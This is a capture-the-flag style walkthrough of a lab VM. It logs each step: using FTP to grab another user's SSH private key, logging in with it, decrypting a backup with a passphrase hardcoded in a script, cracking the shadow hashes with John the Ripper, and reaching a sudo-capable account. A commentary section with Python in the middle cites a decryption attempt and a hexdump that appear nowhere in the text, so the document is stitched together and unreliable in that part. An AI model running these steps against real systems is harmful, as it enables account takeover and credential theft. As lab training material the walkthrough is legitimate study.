220 ProFTPD 1.3.4a Server (LazyAdmin corp.) [192.168.56.101]
Name (192.168.56.102:root): rhedley
331 Password required for rhedley
Password:
230 User rhedley logged in
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> cd ..
250 CWD command successful
ftp> ls
200 PORT command successful
150 Opening ASCII mode data connection for file list
drwxrwxr-x 1 root root 60 May 13 2013 ftp
drwxrwx--- 1 mbrown mbrown 60 Mar 24 2013 mbrown
drwxrwx--- 1 mparker mparker 40 Apr 11 2013 mparker
drwxrwx--- 2 rhedley rhedley 87 Mar 24 2013 rhedley
drwxr-xr-x 2 1000 1000 36 May 12 2013 sraines
drwxrwx--- 5 swillard swillard 128 May 12 2013 swillard
226 Transfer complete
ftp> cd mbrown/.ssh
250 CWD command successful
ftp> ls
200 PORT command successful
150 Opening ASCII mode data connection for file list
-rw-r--r-- 1 mbrown mbrown 1675 Mar 10 2013 downloadkey
-rw------- 1 mbrown mbrown 1675 Mar 10 2013 id_rsa
-rw-r--r-- 1 mbrown mbrown 396 Mar 10 2013 id_rsa.pub
226 Transfer complete
ftp> get downloadkey
local: downloadkey remote: downloadkey
200 PORT command successful
150 Opening BINARY mode data connection for downloadkey (1675 bytes)
226 Transfer complete
1675 bytes received in 0.00 secs (5002.3 kB/s)
ftp> get id_rsa.pub
local: id_rsa.pub remote: id_rsa.pub
200 PORT command successful
150 Opening BINARY mode data connection for id_rsa.pub (396 bytes)
226 Transfer complete
396 bytes received in 0.00 secs (4345.2 kB/s)
ftp>
root@kali:~# more downloadkey
-----BEGIN RSA PRIVATE KEY-----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-----END RSA PRIVATE KEY-----
root@kali:~# ssh -i downloadkey mbrown@192.168.56.101
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@ WARNING: UNPROTECTED PRIVATE KEY FILE! @
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
Permissions 0644 for 'downloadkey' are too open.
It is required that your private key files are NOT accessible by others.
This private key will be ignored.
bad permissions: ignore key: downloadkey
Permission denied (publickey).
root@kali:~# chmod 600 downloadkey
root@kali:~# ssh -i downloadkey mbrown@192.168.56.101
mbrown@webhost:~$
mbrown@webhost:~$ uname -a
Linux webhost 3.5.0-28-generic #48~precise1-Ubuntu SMP Wed Apr 24 21:43:05 UTC 2013 i686 i686 i386 GNU/Linux
mbrown@webhost:~$ pwd
/home/mbrown
mbrown@webhost:~$ su rhedley
Password:
rhedley@webhost:/home/mbrown$
... some privilege escalation processes...
rhedley@webhost:/home/mbrown$ cat /opt/backup.sh
#!/bin/bash
## Backup Script
## by SRaines
## Lazy Admin Corp
TMPBACKUP="/tmp/backup";
NAME_PREFIX="backup";
NAME_DATE=$(date +%y%m%d);
NAME_HOST=$(/bin/hostname);
FILENAME=${NAME_PREFIX}_${NAME_HOST}_${NAME_DATE}.tar;
[ ! -d ${TMPBACKUP} ] && mkdir -p ${TMPBACKUP}
tar cpf ${TMPBACKUP}/${FILENAME} /etc/fstab /etc/apache2 /etc/hosts /etc/motd /etc/ssh/sshd_config /etc/dovecot /etc/postfix /var/www /home /opt
gzip --best -f ${TMPBACKUP}/${FILENAME}
openssl aes-256-cbc -in ${TMPBACKUP}/${FILENAME}.gz -out ${TMPBACKUP}/${FILENAME}.gz.enc -pass pass:wpaR9V616xrDTy98L7Uje2DDU5hWtWhs
mv ${TMPBACKUP}/${FILENAME}.gz.enc ./
rm -fr ${TMPBACKUP}
root@kali:~# openssl enc -d -aes-256-cbc -in backup_webhost_130111.tar.gz.enc -out backup_webhost_130111.tar.gz -pass pass:wpaR9V616xrDTy98L7Uje2DDU5hWtWhs
root@kali:~# file backup_webhost_130111.tar.gz
backup_webhost_130111.tar.gz: gzip compressed data, was "backup_webhost_130111.tar", from Unix, last modified: Fri Jan 11 23:42:00 2013, max compression
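Two details in the decryption above are worth understanding. First, the des3/absconder run exited 0 but produced junk: openssl enc -d only verifies the CBC padding of the last block, which a wrong key passes about once in 256 attempts, so decrypted output has to be validated by its format (the gzip magic 1f 8b that file reports after the real decryption), not by exit status. Second, backup.sh encrypts with -pass pass:... and no -pbkdf2, so the key and IV come from EVP_BytesToKey, a couple of MD5 calls over passphrase and salt; the archive is therefore exactly as strong as the passphrase, and each guess costs almost nothing. The Python below is an added example, not from the page; it parses the Salted__ header from the hexdump above, reproduces the key and IV that openssl -p printed for the des3/absconder attempt, shows the PBKDF2 derivation that openssl enc -pbkdf2 (OpenSSL 1.1.1 and later) uses instead, and implements the gzip-magic check.

```python
import hashlib

SALTED_MAGIC = b"Salted__"

# The 16 header bytes shown in the hd output above (magic + 8-byte salt).
HEADER_FROM_HEXDUMP = bytes.fromhex("53616c7465645f5f6e39351efaaceab9")


def parse_salted_header(data):
    """Return the 8-byte salt of an OpenSSL 'Salted__' file; ValueError otherwise."""
    if len(data) < 16 or data[:8] != SALTED_MAGIC:
        raise ValueError("not an OpenSSL salted file")
    return data[8:16]


def evp_bytes_to_key(password, salt, key_len, iv_len, md=hashlib.md5):
    """Legacy OpenSSL EVP_BytesToKey with count=1: what 'openssl enc -pass pass:...'
    does without -pbkdf2 (MD5 in 1.0.x, SHA-256 from 1.1.0 on). D1 = H(pw||salt),
    D2 = H(D1||pw||salt), ...; key||iv is the concatenation."""
    derived, block = b"", b""
    while len(derived) < key_len + iv_len:
        block = md(block + password + salt).digest()
        derived += block
    return derived[:key_len], derived[key_len:key_len + iv_len]


def pbkdf2_key_iv(password, salt, key_len, iv_len, iterations=10000):
    """What 'openssl enc -pbkdf2' derives instead: PBKDF2-HMAC-SHA256 over the
    same salt, producing key||iv, with a tunable iteration count (-iter)."""
    derived = hashlib.pbkdf2_hmac("sha256", password, salt, iterations, key_len + iv_len)
    return derived[:key_len], derived[key_len:]


def is_gzip(plaintext):
    """The check the wordlist loop lacked: a zero exit status from 'openssl enc -d'
    only means the padding looked valid; the real test is whether the output is
    the format the backup script produced (gzip)."""
    return plaintext[:2] == b"\x1f\x8b"


if __name__ == "__main__":
    salt = parse_salted_header(HEADER_FROM_HEXDUMP)
    key, iv = evp_bytes_to_key(b"absconder", salt, key_len=24, iv_len=8)  # des3 sizes
    print("salt =", salt.hex().upper())
    print("key  =", key.hex().upper())
    print("iv   =", iv.hex().upper())
```

A hardened backup.sh would read the passphrase from a root-only file instead of a literal in a script every local user can read, pass -pbkdf2 with a high -iter count, and write the archive somewhere other than a world-writable FTP incoming directory.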
root@kali:~# tar tvzf backup_webhost_130111.tar.gz
drwxr-xr-x root/root 0 2013-05-13 22:57 etc/
drwxr-xr-x root/root 0 2013-01-11 23:42 etc/ssh/
-rw-r--r-- root/root 125749 2013-01-11 23:42 etc/ssh/moduli
-rw-r--r-- root/root 302 2013-01-11 23:42 etc/ssh/ssh_import_id
-rw-r--r-- root/root 1669 2013-01-11 23:42 etc/ssh/ssh_config
-rw-r--r-- root/root 3924 2013-01-11 23:42 etc/ssh/sshd_config
-rw------- root/root 1374 2013-01-11 23:42 etc/shadow-
drwxr-xr-x root/root 0 2013-01-11 23:42 etc/security/
-rwxr-xr-x root/root 1020 2013-01-11 23:42 etc/security/namespace.init
-rw-r--r-- root/root 1442 2013-01-11 23:42 etc/security/namespace.conf
-rw------- root/root 0 2013-01-11 23:42 etc/security/opasswd
-rw-r--r-- root/root 3635 2013-01-11 23:42 etc/security/group.conf
-rw-r--r-- root/root 4620 2013-01-11 23:42 etc/security/access.conf
-rw-r--r-- root/root 419 2013-01-11 23:42 etc/security/sepermit.conf
-rw-r--r-- root/root 2151 2013-01-11 23:42 etc/security/limits.conf
drwxr-xr-x root/root 0 2013-01-11 23:42 etc/security/namespace.d/
-rw-r--r-- root/root 2980 2013-01-11 23:42 etc/security/pam_env.conf
-rw-r--r-- root/root 2180 2013-01-11 23:42 etc/security/time.conf
-rw-r--r-- root/root 1795 2013-01-11 23:42 etc/security/capability.conf
drwxr-xr-x root/root 0 2013-01-11 23:42 etc/security/limits.d/
-rw-r--r-- root/root 728 2013-01-11 23:42 etc/group
drwxr-xr-x root/root 0 2013-01-11 23:42 etc/skel/
-rw-r--r-- root/root 675 2012-04-03 17:58 etc/skel/.profile
-rw-r--r-- root/root 220 2012-04-03 17:58 etc/skel/.bash_logout
-rw-r--r-- root/root 3486 2012-04-03 17:58 etc/skel/.bashrc
-rw------- root/root 881 2013-01-11 23:42 etc/group-
drwxr-xr-x root/root 0 2013-01-11 23:42 etc/sudoers.d/
-r--r----- root/root 753 2013-01-11 23:42 etc/sudoers.d/README
drwxr-xr-x root/root 0 2013-01-11 23:42 etc/grub.d/
-rwxr-xr-x root/root 6743 2013-01-11 23:42 etc/grub.d/00_header
-rwxr-xr-x root/root 214 2013-01-11 23:42 etc/grub.d/40_custom
-rwxr-xr-x root/root 5522 2013-01-11 23:42 etc/grub.d/05_debian_theme
-rwxr-xr-x root/root 7780 2013-01-11 23:42 etc/grub.d/10_linux
-rwxr-xr-x root/root 6335 2013-01-11 23:42 etc/grub.d/20_linux_xen
-rwxr-xr-x root/root 95 2013-01-11 23:42 etc/grub.d/41_custom
-rwxr-xr-x root/root 1588 2013-01-11 23:42 etc/grub.d/20_memtest86+
-rwxr-xr-x root/root 7603 2013-01-11 23:42 etc/grub.d/30_os-prober
-rw-r--r-- root/root 483 2013-01-11 23:42 etc/grub.d/README
-rwxr-xr-x root/root 1388 2013-01-11 23:42 etc/grub.d/30_uefi-firmware
drwxr-xr-x root/root 0 2013-01-11 23:42 etc/sgml/
-rw-r--r-- root/root 366 2013-01-11 23:42 etc/sgml/catalog
-rw-r--r-- root/root 391 2013-01-11 23:42 etc/sgml/xml-core.cat
-rw-r--r-- root/root 335 2013-01-11 23:42 etc/sgml/catalog.old
-rw-r--r-- root/root 743 2013-01-11 23:42 etc/fstab
-rw-r--r-- root/root 2845 2013-01-11 23:42 etc/sysctl.conf
-rw-r--r-- root/root 65 2013-01-11 23:42 etc/hosts
-rw-r--r-- root/root 3343 2013-01-11 23:42 etc/gai.conf
-rw-rw---- root/sasl 12288 2013-01-11 23:42 etc/sasldb2
-r--r----- root/root 724 2013-01-11 23:42 etc/sudoers
-rw-r--r-- root/root 19 2013-01-11 23:42 etc/su-to-rootrc
-rw-r--r-- root/root 3902 2013-01-11 23:42 etc/securetty
drwxr-xr-x root/root 0 2013-01-11 23:42 etc/groff/
-rw-r--r-- root/root 848 2013-01-11 23:42 etc/groff/mdoc.local
-rw-r--r-- root/root 854 2013-01-11 23:42 etc/groff/man.local
-rw-r--r-- root/root 19281 2013-01-11 23:42 etc/services
drwxr-xr-x root/root 0 2013-01-11 23:42 etc/systemd/
drwxr-xr-x root/root 0 2013-01-11 23:42 etc/systemd/system/
drwxr-xr-x root/root 0 2013-01-11 23:42 etc/systemd/system/multi-user.target.wants/
lrwxrwxrwx root/root 0 2012-12-06 23:55 etc/systemd/system/multi-user.target.wants/rsyslog.service -> /lib/systemd/system/rsyslog.service
-rw-r----- root/shadow 1056 2013-01-11 23:42 etc/shadow
drwxr-xr-x root/root 0 2013-01-11 23:42 etc/sysctl.d/
-rw-r--r-- root/root 1292 2013-01-11 23:42 etc/sysctl.d/10-ptrace.conf
-rw-r--r-- root/root 726 2013-01-11 23:42 etc/sysctl.d/10-kernel-hardening.conf
-rw-r--r-- root/root 519 2013-01-11 23:42 etc/sysctl.d/README
-rw-r--r-- root/root 490 2013-01-11 23:42 etc/sysctl.d/10-ipv6-privacy.conf
-rw-r--r-- root/root 509 2013-01-11 23:42 etc/sysctl.d/10-network-security.conf
-rw-r--r-- root/root 77 2013-01-11 23:42 etc/sysctl.d/10-console-messages.conf
-rw-r--r-- root/root 506 2013-01-11 23:42 etc/sysctl.d/10-zeropage.conf
-rw-r--r-- root/root 87 2013-01-11 23:42 etc/shells
drwxr-xr-x root/root 0 2013-01-11 23:42 etc/gconf/
drwxr-xr-x root/root 0 2013-01-11 23:42 etc/gconf/gconf.xml.defaults/
-rw-r--r-- root/root 0 2013-01-11 23:42 etc/gconf/gconf.xml.defaults/%gconf-tree.xml
drwxr-xr-x root/root 0 2013-01-11 23:42 etc/gconf/2/
-rw-r--r-- root/root 3397 2013-01-11 23:42 etc/gconf/2/evoldap.conf
-rw-r--r-- root/root 1421 2013-01-11 23:42 etc/gconf/2/path
drwxr-xr-x root/root 0 2013-01-11 23:42 etc/gconf/gconf.xml.mandatory/
-rw-r--r-- root/root 0 2013-01-11 23:42 etc/gconf/gconf.xml.mandatory/%gconf-tree.xml
-rw-r--r-- root/root 1194 2013-01-11 23:42 etc/passwd
root@kali:~# mkdir webhost
root@kali:~# mv backup_webhost_130111.tar.gz webhost/
root@kali:~# cd webhost
root@kali:~/webhost# tar xvzf backup_webhost_130111.tar.gz
root@kali:~/webhost# john etc/shadow-
Warning: detected hash type "sha512crypt", but the string is also recognized as "crypt"
Use the "--format=crypt" option to force loading these as that type instead
Loaded 4 password hashes with 4 different salts (sha512crypt [32/32])
rhedley (rhedley)
mbrown (mbrown)
mparker (mparker)
swillard (swillard)
guesses: 4 time: 0:00:00:00 DONE (Wed Jan 8 11:12:15 2014) c/s: 50.00 trying: swillard
root@kali:~/webhost# cat etc/group
root:x:0:
daemon:x:1:
bin:x:2:
sys:x:3:
adm:x:4:
tty:x:5:
disk:x:6:
lp:x:7:
mail:x:8:
news:x:9:
uucp:x:10:
man:x:12:
proxy:x:13:
kmem:x:15:
dialout:x:20:
fax:x:21:
voice:x:22:
cdrom:x:24:
floppy:x:25:
tape:x:26:
sudo:x:27:sraines
audio:x:29:
dip:x:30:
www-data:x:33:
backup:x:34:
operator:x:37:
list:x:38:
irc:x:39:
src:x:40:
gnats:x:41:
shadow:x:42:
utmp:x:43:
video:x:44:
sasl:x:45:
plugdev:x:46:
staff:x:50:
games:x:60:
users:x:100:
nogroup:x:65534:
libuuid:x:101:
crontab:x:102:
syslog:x:103:
fuse:x:104:
messagebus:x:105:
whoopsie:x:106:
mlocate:x:107:
ssh:x:108:
landscape:x:109:
netdev:x:110:
lpadmin:x:111:
sambashare:x:112:
ssl-cert:x:114:
postdrop:x:117:
memcache:x:118:
sraines:x:1000:
mbrown:x:1001:
rhedley:x:1002:
root@kali:~/webhost# john etc/shadow --wordlist=/usr/share/wordlists/darkc0de.lst
Warning: detected hash type "sha512crypt", but the string is also recognized as "crypt"
Use the "--format=crypt" option to force loading these as that type instead
Loaded 3 password hashes with 3 different salts (sha512crypt [32/32])
Remaining 1 password hash
brillantissimo (sraines)
guesses: 1 time: 0:00:36:46 DONE (Wed Jan 8 12:22:24 2014) c/s: 268 trying: brillantissimo
Use the "--show" option to display all of the cracked passwords reliably
root@kali:~# ssh -i downloadkey mbrown@192.168.56.101
mbrown@webhost:~$ su sraines
Unknown id: sraines
mbrown@webhost:~$ su swillard
Password:
swillard@webhost:/home/mbrown$ sudo -l
[sudo] password for swillard:
Matching Defaults entries for swillard on this host:
env_reset, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User swillard may run the following commands on this host:
(ALL : ALL) ALL
swillard@webhost:/home/mbrown$ ls /root
ls: cannot open directory /root: Permission denied
swillard@webhost:/home/mbrown$ sudo ls /root
cleanlogs.sh secret.jpg
swillard@webhost:/home/mbrown$
That's all.
Some hints came from here: http://blog.techorganic.com/2013/12/de-ice-hacking-challenge-part-6.html